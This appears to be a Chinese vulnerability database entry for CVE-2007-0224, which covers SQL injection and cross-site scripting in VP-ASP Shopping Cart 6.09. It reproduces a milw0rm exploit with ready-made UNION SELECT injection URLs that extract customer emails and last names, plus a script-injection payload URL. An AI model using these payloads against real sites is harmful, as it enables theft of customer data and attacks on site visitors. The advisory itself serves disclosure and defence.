Virtual Programming VP-ASP多个跨站脚本及SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111990 漏洞类型 SQL注入
发布时间 2007-01-11 更新时间 2007-01-12
CVE编号 CVE-2007-0224 CNNVD-ID CNNVD-200701-175
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3115
https://www.securityfocus.com/bid/82014
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-175
|漏洞详情
VirtualProgrammingVP-ASP是一款商业性质的电子购物应用系统,由ASP脚本编写。VirtualProgrammingVP-ASP的处理用户请求时存在输入验证漏洞,远程攻击者可以利用这个漏洞获得敏感信息或非授权操作数据库。VP-ASP的shopgiftregsearch.asp和shopcustadmin.asp脚本没有对用户提交的LoginLastname和msg参数数据做充分的检查过滤,攻击者可以通过插入特定的SQL语名或脚本代码,可能获得其他用户浏览器相关的敏感信息,也可对数据库进行更改。
|漏洞EXP
*******************************************************************************
# Title   :  VP-ASP Shopping Cart 6.09 Remote Multiple Vulnerabilities
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.vpasp.com
# $$      :  $49.00 - $350.00 - $495.00

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//shopgiftregsearch.asp?LoginLastname=[SQL]

Example:

//shopgiftregsearch.asp?LoginLastname='%20union%20select%200,email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
//shopgiftregsearch.asp?LoginLastname='%20union%20select%200,lastname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1

This Informations go to login page.

[[/SQL]]

[[XSS]]]---------------------------------------------------------

http://[target]/[path]//shopcustadmin.asp?msg=[XSS]

Example:

//shopcustadmin.asp?msg=%3Cscript%3Ealert('x');%3C/script%3E

[[/XSS]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-11]
|受影响的产品
Virtual Programming Vp-Asp 6.09
|参考资料

来源:MILW0RM
名称:3115
链接:http://www.milw0rm.com/exploits/3115
来源:SECUNIA
名称:23699
链接:http://secunia.com/advisories/23699
来源:OSVDB
名称:32732
链接:http://osvdb.org/32732
来源:XF
名称:vpasp-shopgift-sql-injection(31447)
链接:http://xforce.iss.net/xforce/xfdb/31447
来源:MILW0RM
名称:3115
链接:http://milw0rm.com/exploits/3115